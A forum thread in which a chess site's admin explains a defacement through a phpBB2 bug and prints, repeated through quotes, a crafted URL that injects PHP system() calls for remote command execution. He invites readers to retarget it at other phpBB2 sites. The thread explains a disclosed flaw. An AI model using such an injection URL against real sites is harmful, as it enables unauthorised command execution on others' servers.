Any information about the hack?
Any information about the hack?
... site seems like it's back up and running.
-
gmiller
- Site Admin
- Posts: 1388
- Joined: Sun Mar 14, 1999 11:13 am
- Location: Jeffersonville, IN
- Contact:
There's not much information to give, someone just replaced a bunch of the pages with a "you've been hacked page". If you look at the 2004 tourny page, you'll see what it looked like because I haven't fixed that one yet.
As far as the phpBB2 bug goes, it allowed anyone to execute any shell command they wanted useing a specially crafted URL like the following:
http://www.net-chess.com/phpBB2/viewtop ... ight=%2527
%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)
%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)
%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)
%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(105)
%252echr(100)%252echr(59)%252echr(101)%252echr(99)
%252echr(104)%252echr(111)%252echr(32)%252echr(95)
%252echr(95)%252echr(95)%252echr(70)%252echr(73)
%252echr(77)%252echr(95)%252echr(95)%252echr(95)
%252echr(59))%252e%2527
(if you know another site that uses phpBB2 you can edit the hostname in that URL to see if theirs has been fixed yet).
The bug was announced on the mailing list Bugtraq. The a-hole who defaced this site just saw the bug announcement and used it, not like he's a genious or anything.
I wouldn't think for a minute it was Superchessking, as he's just an idiot. Whoever hit this site probably just punched phpBB2 into Google and started hitting sites.
As far as the phpBB2 bug goes, it allowed anyone to execute any shell command they wanted useing a specially crafted URL like the following:
http://www.net-chess.com/phpBB2/viewtop ... ight=%2527
%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)
%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)
%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)
%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(105)
%252echr(100)%252echr(59)%252echr(101)%252echr(99)
%252echr(104)%252echr(111)%252echr(32)%252echr(95)
%252echr(95)%252echr(95)%252echr(70)%252echr(73)
%252echr(77)%252echr(95)%252echr(95)%252echr(95)
%252echr(59))%252e%2527
(if you know another site that uses phpBB2 you can edit the hostname in that URL to see if theirs has been fixed yet).
The bug was announced on the mailing list Bugtraq. The a-hole who defaced this site just saw the bug announcement and used it, not like he's a genious or anything.
I wouldn't think for a minute it was Superchessking, as he's just an idiot. Whoever hit this site probably just punched phpBB2 into Google and started hitting sites.
-
dragondude
- Posts: 15
- Joined: Sat Nov 25, 2000 3:16 pm
jjones ?? at work or play ??
WOW ... making up bugs to "ZAP" people is certainly an art that looks more difficult than chess... maybe that's how the original "zapper"gmiller wrote: As far as the phpBB2 bug goes, it allowed anyone to execute any shell command they wanted useing a specially crafted URL like the following:
http://www.net-chess.com/phpBB2/viewtop ... ight=%2527
%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)
%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)
%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)
%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(105)
%252echr(100)%252echr(59)%252echr(101)%252echr(99)
%252echr(104)%252echr(111)%252echr(32)%252echr(95)
%252echr(95)%252echr(95)%252echr(70)%252echr(73)
%252echr(77)%252echr(95)%252echr(95)%252echr(95)
%252echr(59))%252e%2527
(.
on this site was able to zap me a few years ago. 
looks more complicated that the Sicilian Ritcher-Rauzer Attack 